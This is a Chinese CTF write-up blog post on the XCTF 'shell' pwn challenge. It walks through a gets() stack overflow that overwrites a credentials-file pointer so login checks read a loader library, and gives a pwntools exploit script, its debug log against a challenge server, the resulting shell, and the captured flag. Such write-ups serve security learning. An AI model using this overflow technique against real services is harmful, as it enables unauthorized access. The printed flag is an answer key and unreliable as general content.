shell [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列25

最新推荐文章于 2023-04-02 15:55:09 发布
最新推荐文章于 2023-04-02 15:55:09 发布
阅读量686 收藏
点赞数
分类专栏: XCTF-PWN CTF 文章标签: xctf 攻防世界 ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/103736315
版权
CTF 同时被 2 个专栏收录
46 篇文章 4 订阅
订阅专栏
XCTF-PWN
28 篇文章 10 订阅
订阅专栏

题目地址:shell

这个题目是高手进阶区的第14题,这一题我没有按照顺序来,耍脾气来!呵呵

看看保护机制

[*] '/ctf/work/python/shell/shell'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

开启了Canary和NX

反编译c语言代码

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // eax
  __int64 v4; // [rsp+0h] [rbp-F0h]
  __int64 v5; // [rsp+8h] [rbp-E8h]
  __int64 v6; // [rsp+10h] [rbp-E0h]
  __int64 v7; // [rsp+18h] [rbp-D8h]
  const char **addr_cmd; // [rsp+30h] [rbp-C0h]
  const char *szFileP; // [rsp+38h] [rbp-B8h]
  const char *szFileU; // [rsp+40h] [rbp-B0h]
  size_t n; // [rsp+48h] [rbp-A8h]
  __ssize_t nLenRead; // [rsp+50h] [rbp-A0h]
  char *lineptr; // [rsp+58h] [rbp-98h]
  FILE *stream; // [rsp+60h] [rbp-90h]
  char szTip; // [rsp+6Fh] [rbp-81h]
  int bAuth; // [rsp+70h] [rbp-80h]
  int szUsername; // [rsp+74h] [rbp-7Ch]
  int szPassword; // [rsp+94h] [rbp-5Ch]
  int szInput; // [rsp+B4h] [rbp-3Ch]
  char *filename; // [rsp+D8h] [rbp-18h]
  const char **v21; // [rsp+E0h] [rbp-10h]
  int v22; // [rsp+E8h] [rbp-8h]
  int v23; // [rsp+ECh] [rbp-4h]

  v23 = 0;
  v22 = argc;
  v21 = argv;
  filename = "creds.txt";
  bAuth = 0;
  szTip = '$';
  setvbuf(_bss_start, 0LL, 2, 0LL);
  while ( 1 )
  {
    while ( 1 )
    {
      printf("%c ", (unsigned int)szTip, v4, v5, v6, v7);
      gets((__int64)&szInput);
      if ( !strcmp((const char *)&szInput, "login") )
        break;
      addr_cmd = command_get((const char *)&szInput);
      if ( addr_cmd )
      {
        if ( *((_DWORD *)addr_cmd + 4) != 1 || bAuth == 1 )
          ((void (__fastcall *)(int *, const char *))addr_cmd[1])(&szInput, "login");
        else
          HIDWORD(v4) = puts("Permission denied");
      }
      else
      {
        LODWORD(v4) = puts("Command not found");
      }
    }
    printf("Username: ", "login");
    HIDWORD(v7) = gets((__int64)&szUsername);
    LODWORD(v7) = printf("Password: ");
    HIDWORD(v6) = gets((__int64)&szPassword);
    stream = fopen(filename, "r");
    for ( lineptr = 0LL; ; lineptr = 0LL )
    {
      n = 0LL;
      nLenRead = getline(&lineptr, &n, stream);
      if ( nLenRead < 0 )
      {
        free(lineptr);
        goto LABEL_12;
      }
      lineptr[nLenRead - 1] = 0;
      szFileU = strtok(lineptr, ":");
      szFileP = strtok(0LL, ":");
      if ( szFileU )
      {
        if ( szFileP && !strcmp((const char *)&szUsername, szFileU) && !strcmp((const char *)&szPassword, szFileP) )
          break;
      }
      free(lineptr);
    }
    v3 = puts("Authenticated!");
    szTip = 35;
    bAuth = 1;
    LODWORD(v6) = v3;
LABEL_12:
    if ( bAuth != 1 )
      HIDWORD(v5) = puts("Authentication failed!");
    LODWORD(v5) = fclose(stream);
  }
}

fgets的函数存在栈溢出,看起来很明显

我用ida调试了几遍,发现没法使用溢出,根本就走不到退出程序,就已经崩溃了,因为读文件读不到。

所以我考虑覆盖filename的地址,在ida的string窗口中查看一下,发现存在文件ld-linux-x86-64.so.2

我们就考虑直接覆盖filename的地址覆盖为0x400200

我们下载的文件包中已经有这个文件,我们写个程序搜索一下合适的username和password

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(void)
{
	FILE * fp;
	char * line = NULL;
	size_t len = 0;
	ssize_t read;
	fp = fopen("ld-linux-x86-64.so.2", "r");
	if (fp == NULL)
		exit(EXIT_FAILURE);
	while ((read = getline(&line, &len, fp)) != -1)
	{
		// printf("%s", line);
		char* szDup = strdup(line);

		char *p = NULL;
		int bFind = 0;
		p = strtok(line, ":");
		char *p1 = NULL;
		p1 = strtok(NULL, ":");
		if(p != NULL & p1 != NULL)
		{
			printf("==>%s:%s", p, p1);
			bFind = 1;
		}

		if(bFind == 1)
			printf("++>%s\n", szDup);

		free(szDup);
	}
	if (line)
		free(line);
	exit(EXIT_SUCCESS);
}

执行结果如下:

root@mypwn:/ctf/work/python/shell# ./findstring 
ܹܹןkC(?????F?++>ֻ$=uTi7J??GC???p?T??B???#d?<I?Xx?k߱;??k?<??sB?Ҋ|F:m?<?9
==>	Version information:
++>	Version information:

==>prelink checking: %s
++>prelink checking: %s

==>relocation processing: %s%s
++>relocation processing: %s%s

==>calling init: %s
++>calling init: %s

==>calling preinit: %s
++>calling preinit: %s

==>calling fini: %s [%lu]
++>calling fini: %s [%lu]

==>conflict processing: %s
++>conflict processing: %s

==>runtime linker statistics:
++>runtime linker statistics:

==>  total startup time in dynamic loader: %s
++>  total startup time in dynamic loader: %s

==>      number of relocations from cache: %lu
++>      number of relocations from cache: %lu

==>        number of relative relocations: %lu
++>        number of relative relocations: %lu

==>WARNING: Unsupported flag value(s) of 0x%x in DT_FLAGS_1.
++>WARNING: Unsupported flag value(s) of 0x%x in DT_FLAGS_1.

==>    entry: 0x%0*lx  phdr++>    entry: 0x%0*lx  phdr: 0x%0*lx  phnum:   %*u

==>runtime linker statistics:
++>runtime linker statistics:

==>           final number of relocations: %lu
++>           final number of relocations: %lu

==>final number of relocations from cache: %lu
++>final number of relocations from cache: %lu

找一个短点的,构造python脚本如下:

#coding:utf8
#!python
#!/usr/bin/env python
 
from pwn import *
 
context.log_level = 'debug'
process_name = './shell'
# p = process([process_name], env={'LD_LIBRARY_PATH':'./'})
p = remote('111.198.29.45', 42941)
elf = ELF(process_name)

# system_sh_addr = 0x400905
# pop_rdi_ret = 0x400f33
libc_file_addr = 0x400200

p.sendlineafter('$ ', 'A'*(0x3C-0x18) + p64(libc_file_addr))
p.sendlineafter('$ ', 'login')
p.sendlineafter('Username: ', 'prelink checking')
pause()
p.sendlineafter('Password: ', ' %s')


p.interactive()

执行结果如下:

root@mypwn:/ctf/work/python/shell# python shell.py 
[+] Opening connection to 111.198.29.45 on port 42941: Done
[DEBUG] PLT 0x4006fc free
[DEBUG] PLT 0x400710 puts
[DEBUG] PLT 0x400720 fclose
[DEBUG] PLT 0x400730 __stack_chk_fail
[DEBUG] PLT 0x400740 system
[DEBUG] PLT 0x400750 printf
[DEBUG] PLT 0x400760 __libc_start_main
[DEBUG] PLT 0x400770 strcmp
[DEBUG] PLT 0x400780 __gmon_start__
[DEBUG] PLT 0x400790 gets
[DEBUG] PLT 0x4007a0 setvbuf
[DEBUG] PLT 0x4007b0 fopen
[DEBUG] PLT 0x4007c0 strtok
[DEBUG] PLT 0x4007d0 getline
[DEBUG] PLT 0x4007e0 exit
[*] '/ctf/work/python/shell/shell'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[DEBUG] Received 0x2 bytes:
    '$ '
[DEBUG] Sent 0x2d bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000020  41 41 41 41  00 02 40 00  00 00 00 00  0a           │AAAA│··@·│····│·│
    0000002d
[DEBUG] Received 0x11 bytes:
    'Command not found'
[DEBUG] Received 0x3 bytes:
    '\n'
    '$ '
[DEBUG] Sent 0x6 bytes:
    'login\n'
[DEBUG] Received 0xa bytes:
    'Username: '
[DEBUG] Sent 0x11 bytes:
    'prelink checking\n'
[*] Paused (press any to continue)
[DEBUG] Received 0xa bytes:
    'Password: '
[DEBUG] Sent 0x4 bytes:
    ' %s\n'
[*] Switching to interactive mode
[DEBUG] Received 0xe bytes:
    'Authenticated!'
Authenticated![DEBUG] Received 0x3 bytes:
    '\n'
    '# '

# $ sh
[DEBUG] Sent 0x3 bytes:
    'sh\n'
$ sh
[DEBUG] Sent 0x3 bytes:
    'sh\n'
$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
[DEBUG] Received 0x23 bytes:
    'bin\n'
    'dev\n'
    'flag\n'
    'lib\n'
    'lib32\n'
    'lib64\n'
    'shell\n'
bin
dev
flag
lib
lib32
lib64
shell
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x2d bytes:
    'cyberpeace{6ead2b810d6eb8f605a7c153ca1c5044}\n'
cyberpeace{6ead2b810d6eb8f605a7c153ca1c5044}

执行成功。

3riC5r
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-RE】新手练习-Hello, CTF.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/gisa2b
Qt入门--在windows7-64系统上安装Qt
11-22 4132
第一次接触Qt,安装了好几个版本,浪费了不少时间,编译手机APP时不通过,看到有网友说是系统兼容性问题,Qt只有32位版,都准备把系统换成32位的win7了,又重新装了一遍,呵呵,所以然成了!!! 重点:64位系统上是可能正常使用32位的Qt的 以下是在windows7-64位版本上安装Qt(32位的)配套软件,我主要是编手机APP,所以只安装以下三个,VS...
(1)Shell 编程学习 Shell是什么?Shell的浅显原理 为什么要学Shell 及其第一个Shell脚本 CTF角度学习Shell
AAAAAAAAAAAA66的博客
12-25 1555
最近刷CTF题目的时候经常要用到Shell语言,但是自己并没有系统的学习,所以最近花了点时间学习一下,所以重新来梳理一下。对于稍微有一点编程语言基础的同学,能上手Shell其实不需要半小时(甚至更短),当然熟练运用还是需要积累的。 目录 Shell是什么? 主观定义 官方定义及原理 为什么要学Shell编程 第一个Shell脚本 CTF用到的shell Shell是什么? 主观定义 主观的来说:大家只要用过电脑,就接触到了Shell,比如说自己电脑打开win+r,打开cmd,虚..
Pwn 学习 question_5_plus_x64 ret2csu
MrTreebook的博客
05-01 336
Pwn 学习 question_5_plus_x64 ret2csu1.源代码2.源代码分析3._libc_csu_init 分析4.ROP编程5.ropper看以下gadget6.exp[点击跳转 libc database search](https://libc.blukat.me/)7.看一下效果所有源代码和程序以及调试程序都放在了gitee 1.源代码 #include<stdio.h> #include<stdlib.h> #include<unistd.h>
CTF】命令执行RCE
qq_53099119的博客
04-02 2477
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
welpwn [XCTF-PWN][高手进阶]CTF writeup攻防世界题解系列24
重新启程
12-27 1172
题目地址:welpwn 本题是高手进阶的第13题,先看看题目 照例检查一下保护机制 [*] '/ctf/work/python/welpwn/a9ad88f80025427592b35612be5492fd' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found ...
CTF之命令执行漏洞(python)
weixin_46184517的博客
04-19 1108
1. 打开环境,页面有两个按钮,分别为‘选择文件’&&‘上传’ 2. 右键检查页面源代码,提示会将上图的文件当作python代码执行,只允许上传‘jpg’&&‘png’为后缀的图片 3. 我们新建一个txt文件,将python代码入文件 (1)为什么要执行import os? 我们在python下程序,需要对文件以及文件夹或者其他的进行一系列的操作。但是,我们怎么在python中对文件进行操作呢?这就引入了os模块了。 例如: os.name返回当前系统 os.getc
XCTF-Mobile】新手练习-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF-Mobile】新手练习-04-easyjava.apk
08-04
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjava
XCTF-RE】新手练习-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
刷题[De1CTF 2019]ShellShellShell
weixin_43610673的博客
10-10 2267
关键字:sql注入,反序列化原生类,ssrf,绕过unlink() 这两题缝合出来的,tmd好难 https://github.com/rkmylo/ctf-write-ups/tree/master/2018-n1ctf/web/easy-php-540 https://xi4or0uji.github.io/2018/11/06/2018%E4%B8%8A%E6%B5%B7%E5%B8%82%E5%A4%A7%E5%AD%A6%E7%94%9F%E4%BF%A1%E6%81%AF%E5%AE%89%E5
ctf python大法好_247CTF的9个web题目分析
weixin_39558317的博客
02-23 1206
最近朋友推荐几个web题目,都是这个平台的,感觉有些题目还不错,web有十个,有一个要用机器学习识别验证码,就没搞,就了九个,还是学到了一些骚思路的,还是太菜了HELICOPTER ADMINISTRATORS——Hard考点从XSS入手,利用SSRF去访问后端的一个有SQLite注入的查询服务XSS=>SSRF=>SQLite注入描述This applications admini...
关于BMZCTFshell_exec的解法详解
永远是少年
01-15 1133
在BMZCTF中,有一道题是shell_exec,在尝试做了该题后,又翻看了现有的write-up,发现现有的write-up语焉不详,对于不原理和微操讲解不细,因此了这篇文章,主要是在前人的基础上对此题进行进一步描述,主要针对刚接触此领域的小白用户,希望能够对他们理解这道题提供帮助。 首先,打开本题,可以看到如下界面: 进行测试,发现输入一个IP地址或者域名后,可以PING测试对应的IP,然后把结果反馈到界面上来。 之后,查看页面源代码(不要问我为什么要查看页面源代码,做CTF题查看页面源代码应该是本
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 1837
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
shellctf2022-writeup
Todog的博客
08-18 382
CTF
unsupported flags dt_flags_1=0x8000001
123456789
03-06 861
unsupported flags dt_flags_1=0x8000001
攻防世界 Reverse simple-unpack
MrTreebook的博客
03-10 5129
攻防世界 Reverse simple-unpack1.upx解压(脱壳)2.strings | xxd 1.upx解压(脱壳) 使用upx -d simple-unpack命令解压 root@ubuntu:~/Desktop/git/ctf-reverse# upx -d simple-unpac Ultimate Packer for eXecutables Copyright (C) 1996 - 20
攻防世界pwn新手题答案
最新发布
08-10
- *1* *2* [xctf攻防世界pwn基础题解(新手食用)](https://blog.csdn.net/lplp9822/article/details/89735167)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值